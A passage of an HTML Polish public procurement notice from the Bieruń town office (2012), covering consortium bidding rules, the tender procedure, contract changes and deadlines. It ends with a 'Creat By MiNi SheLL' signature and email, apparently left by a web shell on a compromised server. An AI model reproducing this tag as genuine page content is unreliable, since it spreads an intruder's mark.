- cel zawarcia ( wspólny udział w postępowaniu przetargowym i wspólna realizacja zamówienia  
   publicznego),
-datę udzielenia pełnomocnictwa,
-  podpisy wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia,  zgodne z zasadą ich reprezentacji.
Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem / Liderem. 
   b)   Oświadczenia wymienione w pkt. V.A SIWZ powinny być złożone w taki sposób, aby warunki ,                
              o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie. 
        c)   Dokumenty wymienione w pkt. V B ppkt. 1 i 2 Listy wymaganych dokumentów, powinny być 
            złożony w taki sposób, aby warunki o których mowa w pkt. IV SIWZ, wykonawcy występujący 
            wspólnie spełnili łącznie. 
        d) Dokumenty wymienione w pkt. V B ppkt. 3 i 4 Listy wymaganych dokumentów składa każdy                           
            z wykonawców wchodzących w skład podmiotu występującego wspólnie. 
        e) Kopie dokumentów dotyczących wykonawcy powinny być poświadczane za zgodność 
            z oryginałem przez wykonawcę, którego dokument dotyczy lub przez lidera lub przez wszystkich 
            wykonawców wchodzących w skład tego podmiotu.
C) Do oferty zaleca się załączyć informacje  w zakresie :
    Części zamówienia, która zostanie powierzona podwykonawcom. W przypadku braku 
    złożenia informacji w tym zakresie, zamawiający uzna, że wykonawca wykona całość 
    zamówienia sam bez powierzenia części zamówienia podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany postanowień umowy w zakresie:
a.	Wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany zgodnie                  
z obowiązującą stawką. 
b.	Zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy z zachowaniem 
wymagań określonych w SIWZ, jakie osoby te powinny spełniać. 
c.	Zmiany zakresu części zamówienia powierzonego podwykonawcy lub powierzenia  
podwykonawcy części zakresu zamówienia,  w przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzania oferty; 
d.	Mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana        
powszechnie obowiązujących przepisów prawa.
e.	Innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które nie 
wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2012 godzina 10:00, miejsce: Urząd Miejski w Bieruniu - SEKRETARIAT  ( pok. nr 9, I piętro, segment A) ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com